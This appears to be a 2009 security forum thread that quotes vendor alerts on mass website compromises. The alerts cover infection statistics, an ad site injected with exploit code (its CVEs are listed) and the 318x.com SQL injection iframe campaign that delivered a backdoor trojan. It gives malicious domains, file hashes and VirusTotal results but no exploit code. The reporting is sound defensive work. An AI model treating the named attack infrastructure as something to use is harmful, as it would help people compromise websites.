6 million pwnd - Mass web infections spike
- http://sunbeltblog.blogspot.com/2009/10/dangerous-www-in-3q09-early-6-million.html
October 27, 2009 - "Dasient web security firm of Palo Alto, Calif., published some dismal numbers on its blog today. The number of infected pages on the web increased significantly in the third quarter and more than a third of infected sites that are fixed are quickly reinfected, they said. The company said its malware analysis platform found more than 640,000 infected sites with a total of 5.8 million pages in the quarter. They compare that to the three million infected pages that Microsoft reported in the first quarter of the year.
The attacks:
-- JavaScript (54.8%)
-- iFrame (37.1%)
-- "other" (8.1%)
... with that preponderance of JavaScript malware, if you haven’t updated your Adobe Reader and Acrobat installations recently, you might do so. Dasient blog here*."
* http://blog.dasient.com/2009/10/new-q309-malware-data-and-dasient.html
October 27, 2009

- http://www.theregister.co.uk/2009/10/27/mass_website_compromises_spike/
27 October 2009


2009-11-05, 20:13

Media-servers.net compromised
- http://securitylabs.websense.com/content/Alerts/3500.aspx
11.05.2009 - "Websense... has detected that the site media-servers.net has been compromised and injected with malicious code. The Web site belongs to a high-profile advertiser on the Internet realm. It's important to note that media-servers.net serves advertising content from ad.media-servers.net, and that this site is clean. The injected code is part of an ongoing mass injection campaign that compromised thousands of legitimate Web sites... The exploits associated with this attack are:
• Microsoft DirectShow CVE-2008-0015
• Microsoft Snapshot Viewer CVE-2008-2463
• Microsoft Data Access Components (MDAC) CVE-2006-0003
• AOL ConvertFile() remote buffer overflow exploit
There is also an autoloading malicious PDF file that holds the next vulnerabilities:
• Adobe Reader and Acrobat 8.1.1 buffer overflow CVE-2007-5659
• Adobe Acrobat and Reader 8.1.2 buffer overflow CVE-2008-2992 ...
If the user's browser is successfully exploited, a malicious file is downloaded and run in the user's Windows home directory from another collaborated exploit site. The malicious file (SHA1: 6776489a0ed889fbabb317763c7c913fdc782631) has an extremely low AV detection rate* at the time the file was checked..."
* http://www.virustotal.com/analisis/ed4555f62fb463a42ea399bbdd8594e2f6ed0c6195831200840013a2541c7c84-1257416198
File file.exe received on 2009.11.05 10:16:38 (UTC)
Result: 2/40 (5.00%)

(Screenshot available at the Websense URL above.)


2009-12-10, 19:39

303,000+ hit by SQL injection
- http://www.net-security.org/secworld.php?id=8604
10 December 2009 - "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports* that the injected iframe loads malicious content from 318x .com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009..."
* http://blog.scansafe.com/journal/2009/12/9/318x-sql-injection-claims-125000.html
"... Detection of the trojan is spotty, with 22/40 antivirus vendors detecting the variant according to this VirusTotal report**..."
** http://www.virustotal.com/analisis/f7637523c5aa2c0c2ddcb8cbc895732ed4a9ca83976885c3d458350e1d203f2a-1260300034
File 8ad31d8d6fc4cb12c9beec93d62d340e received on 2009.12.08 19:20:34 (UTC)
Result: 22/40 (55.00%)

- http://blog.scansafe.com/journal/2009/12/10/318x-compromises-bigger-on-yahoo.html
December 10, 2009 - "... a Yahoo search on the 318x iframe reveals a considerably higher number of hits. Does this mean Google is capping the SERPs at some arbitrary point? Currently, Yahoo is showing 303,000 on my end while a Google search on the 318x iframe is showing 159,000 (up from 125,000 yesterday and 132,000 earlier today)."

- https://www.sans.org/newsletters/newsbites/newsbites.php?vol=11&issue=97#sID300
December 10, 2009 - "... A newly-detected SQL injection attack has infected nearly 300,000 web pages with an invisible iframe that gathers malicious code from a series of web sites. The malware seeks vulnerable versions of Adobe Flash, Internet Explorer (IE) and other applications on users' computers and then installs malware that steals online banking credentials."

- http://google.com/safebrowsing/diagnostic?site=318x.com/
"... last time Google visited this site was on 2009-12-15, and the last time suspicious content was found on this site was on 2009-12-15. Malicious software includes 5853 trojan(s), 3423 scripting exploit(s), 1 exploit(s)..."